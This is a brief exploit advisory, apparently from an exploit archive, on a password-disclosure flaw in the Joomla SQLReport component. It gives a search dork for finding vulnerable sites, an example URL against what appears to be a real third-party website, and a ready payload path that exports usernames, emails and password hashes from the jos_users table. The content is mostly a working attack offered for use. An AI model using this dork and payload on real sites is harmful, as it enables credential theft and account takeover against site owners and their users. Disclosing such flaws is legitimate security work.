Joomla SQLReport component suffers from a remote password disclosure vulnerability.
8a1a559d9741c85617b9c407b8507949d56fcd538919350b591faa32da21b46d
Title:Password Disclosure Vulnerability
Author:AsSerT && MetAiZM
Vendor:Joomla
Dork:inurl:com_sqlreport
Disclosure:
http://www.pointrobertsracing.com/administrator/components/com_sqlreport/ajax/cvs.php?table=jos_users&fields=username%7Cemail%7Cpassword&filters=&username=&user_id=0
csv extension File Open!
Payload:
/administrator/components/com_sqlreport/ajax/cvs.php?table=jos_users&fields=username%7Cemail%7Cpassword&filters=&username=&user_id=0